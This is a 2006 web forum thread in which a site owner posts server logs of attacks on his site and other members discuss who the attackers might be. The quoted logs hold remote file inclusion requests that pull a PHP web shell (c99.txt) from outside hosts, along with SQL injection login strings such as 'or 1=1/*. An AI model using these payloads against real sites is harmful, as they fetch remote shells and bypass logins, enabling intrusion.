Repeated hack attempts hacker in this forum ?

ijk · 10-22-2006

Repeated hack attempts on my site below. I think this hacker might be a member of this forum

Quote:

88.226.41.159 - - [22/Oct/2006:08:45:17 -0500] "GET /inc/design.inc.php?dir[inc]=http://hometown.aol.com/yarivgiladi/musa.php? HTTP/1.1" 200 40

Quote:

88.229.187.108 - - [22/Oct/2006:10:07:52 -0500] "GET /inc/design.inc.php?dir[inc]=http://hometown.aol.com/yarivgiladi/musa.php? HTTP/1.1" 200 40

Quote:

88.224.236.46 - - [22/Oct/2006:10:48:52 -0500] "GET /inc/design.inc.php?dir[inc]=http://www.dogubey.by.ru/c99.txt? HTTP/1.1" 200 40

Quote:

85.96.132.92 - - [22/Oct/2006:10:59:15 -0500] "GET /inc/design.inc.php?dir[inc]=http://hometown.aol.com/yarivgiladi/musa.php? HTTP/1.1" 200 40

whats do the below lines mean

Code:

You must login or register to view the code on ModMySite.

10-22-2006

You can start by going to arin.net then do an nslookup etc etc and hunt them down...lol

Todd

ijk · 10-22-2006

using proxies so whatever whois info is there is not going to be much help.

but they seems hell bent on a sunday evening on bringing my site down.

Smoge · 10-23-2006

Quote:

Originally Posted by ijk

Repeated hack attempts on my site below. I think this hacker might be a member of this forum

I did some basic searches of the MMS userlog against those IP's - and did not find any usernames that look like they would be hackers - based on the list and the posts made by users, for example, in the 88. address space. And as you mentioned - the IPs shown in your logs could be proxied / faked anyways.

Smoge

Smoge · 10-23-2006

Hmmm... there is perhaps one, mentioned by someone else by name - that is in that IP space, 88.229.XXX.XXX

Smoge

ijk · 10-23-2006

Pretty sure there is one here if not more.

More hack attempts.

Quote:

85.107.122.77 - - [23/Oct/2006:07:58:08 -0500] "GET //inc/design.inc.php?dir[inc]=http://www.korsans.by.ru/c99.txt? HTTP/1.1" 200 40

Quote:

88.229.206.183 - - [23/Oct/2006:06:49:32 -0500] "GET /inc/design.inc.php?dir[inc]=http://hometown.aol.com/yarivgiladi/musa.php? HTTP/1.1" 200 40

ijk · 10-23-2006

Or was it From Russia with love

Another attack, they seem to love me, what have I done wrong

Quote:

+----------------------+-----------------+---------------------+-----------------+------------+
| Name | Password | Login_Time | IP | Action |
+----------------------+-----------------+---------------------+-----------------+------------+
| aaaaa' | 1 | 2006-10-23 09:41:22 | 83.237.21.23 | Failed |
| admin | 'or 1=1/* | 2006-10-23 09:41:40 | 83.237.21.23 | Failed |
| 'or 1=1/* | 'or 1=1/* | 2006-10-23 09:41:48 | 83.237.21.23 | Failed |
| ; | 1 | 2006-10-23 09:42:03 | 83.237.21.23 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:24 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:24 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:24 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:24 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:28 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:28 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
| | 'or 1=1/* | 'or 1=1/* | 2006-10-23 14:51:14 | 83.237.21.23 | Failed

Code:

You must login or register to view the code on ModMySite.

ijk · 10-23-2006

here are a selection of the choice few.

Code:

You must login or register to view the code on ModMySite.

After all that not one successful login.

Smoge has userlog been sanitized as these popups are a pain.

But this would be a great advert for the userlog. God knows how many people are unware of attacks on their site. And if successful attempts were made would be full unaware. This is a must have mod.

Smoge · 10-26-2006

Quote:

Originally Posted by ijk

Smoge has userlog been sanitized as these popups are a pain.

But this would be a great advert for the userlog. God knows how many people are unware of attacks on their site. And if successful attempts were made would be full unaware. This is a must have mod.

Hi,

Yes - we posted that fix here.

Smoge

baris · 10-27-2006

ijk,

It looks like You have been tested out with acunetix (a server security program that looks for the holes, open ports and other stuff that can give a hacker pretty good information about Your system)

Shit happens

10-22-2006	#3 (permalink)
ijk Join Date: Apr 2005 Posts: 343	proxy using proxies so whatever whois info is there is not going to be much help. but they seems hell bent on a sunday evening on bringing my site down. __________________ AE Version 4.0 IQ

10-23-2006	#5 (permalink)
Smoge Administrator Join Date: Mar 2005 Posts: 5,603	Hmmm... there is perhaps one, mentioned by someone else by name - that is in that IP space, 88.229.XXX.XXX Smoge __________________ ModMySite Administrator Problems? Questions? Need modifications or other help with your site? Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.

10-23-2006	#8 (permalink)
ijk Join Date: Apr 2005 Posts: 343	1000 plus login attempts here are a selection of the choice few. Code: You must login or register to view the code on ModMySite. After all that not one successful login. Smoge has userlog been sanitized as these popups are a pain. But this would be a great advert for the userlog. God knows how many people are unware of attacks on their site. And if successful attempts were made would be full unaware. This is a must have mod. __________________ AE Version 4.0 IQ Last edited by ijk; 10-23-2006 at 02:14 PM.

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
Hack Attempts	sillywabbit	Dolphin General Discussion v5.0 to v5.21	10	09-01-2006 10:48 AM
Rate.Php - HAck Attempts?	Smoge	Security / Server Administration	1	09-06-2005 01:57 PM

10-22-2006	#2 (permalink)
Prometheus Guest Posts: n/a	You can start by going to arin.net then do an nslookup etc etc and hunt them down...lol Todd

10-27-2006	#10 (permalink)
baris Join Date: Oct 2006 Posts: 25	ijk, It looks like You have been tested out with acunetix (a server security program that looks for the holes, open ports and other stuff that can give a hacker pretty good information about Your system) Shit happens

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)